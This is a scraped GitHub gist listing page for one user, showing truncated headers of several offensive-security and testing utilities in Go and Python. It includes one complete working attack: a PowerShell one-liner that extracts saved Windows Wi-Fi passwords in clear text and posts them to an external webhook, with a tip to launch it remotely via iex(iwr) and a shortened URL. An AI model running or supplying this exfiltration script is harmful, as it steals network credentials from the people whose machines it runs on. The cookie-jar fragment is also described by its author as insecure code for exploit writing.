This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "errors" | |
| "log" | |
| "net" | |
| "net/http" | |
| "strings" | |
| "net/http/httputil" | |
| "flag" |
fyxme
/ webserver.go
Last active
November 7, 2024 20:07
Golang webserver with ip and request logging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "net/http" | |
| "net/http/httputil" | |
| "flag" | |
| "strings" | |
| "os" |
fyxme
/ exfil-wifi-creds.ps1
Created
November 1, 2023 20:31
Retrieve and Exfil Wifi Credentials Stored on a Windows Device to an External Webhook
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A simple powershell oneliner to exfil wifi creds | |
| # most of the code was borrowed from this gist which deserves all the credit: | |
| # https://gist.github.com/CybersamuraiDK/6e0be5c0c47165228895079efa8d98ec | |
| # can also be run using iex(iwr ....) with a shortened url so its easy to type out | |
| $WEBHOOK="https://webhook.site/XXXX" # change this to your own webhook | |
| (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | ConvertTo-Json | %{ curl.exe -d "data=$_" -X POST $WEBHOOK } |
fyxme
/ print_har_endpoints.py
Created
December 5, 2023 05:29
Print HAR file endpoints (METHOD + URL)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # yonked 95% from https://gist.github.com/craSH/892479/raw/21d5c3222739743cad6e6e5c5f1597daecbe560e/har_response_urls.py | |
| # | |
| # Running more than one file: (Cbf updating this script even thought it would be trivial) | |
| # IFS=$'\n' | |
| # for f in `find .. | grep har`; do ./har_response_urls.py "$f"; done | tee all.txt | |
| import json |
fyxme
/ replay-http.go
Last active
February 16, 2024 15:58
Replay an HTTP request from a txt file in golang
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // src: https://gist.github.com/fyxme/25fb9bc7a3c76997ec51da30d3f3e4dd | |
| import ( | |
| "bufio" | |
| "flag" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" |
fyxme
/ requirements.txt
Created
January 3, 2025 23:54
Using Python to send emails via the Outlook web interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| exchangelib |
fyxme
/ minimalcj.go
Last active
January 17, 2025 23:44
Golang Minimal CookieJar Implementation which always returns all cookies, regardless of domain or url (Insecure but usefull for testing or writing POCs)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Minimal CookieJar implementation which always returns all cookies (ie. disregard the url passed and cookie domain) | |
| Usefull for testing or writing exploit code (eg. during a CTF where ip/host/domains may be interchanged in the client) | |
| WARNING: Do not use in prod.. this is super unsafe... Just good for testing | |
| Author: fyx.me | |
| gist: https://gist.github.com/fyxme/2bceed4038e2be71ce1deb7e6e9db434 |
OlderNewer